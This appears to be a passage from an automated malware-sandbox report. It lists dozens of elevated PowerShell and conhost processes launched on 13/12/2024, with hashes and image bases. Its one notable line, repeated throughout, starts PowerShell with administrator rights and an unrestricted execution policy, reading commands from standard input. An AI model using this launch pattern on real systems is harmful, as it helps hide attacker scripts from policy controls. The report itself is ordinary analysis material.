                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:38
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:39
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:40
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:41
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:42
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:45
                                                                                                                                                                      Start time:10:32:04
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:46
                                                                                                                                                                      Start time:10:32:04
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:47
                                                                                                                                                                      Start time:10:32:06
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:48
                                                                                                                                                                      Start time:10:32:06
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:49
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:50
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:51
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:52
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:53
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:54
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:55
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:56
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:57
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:58
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:59
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:60
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:61
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:62
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      No disassembly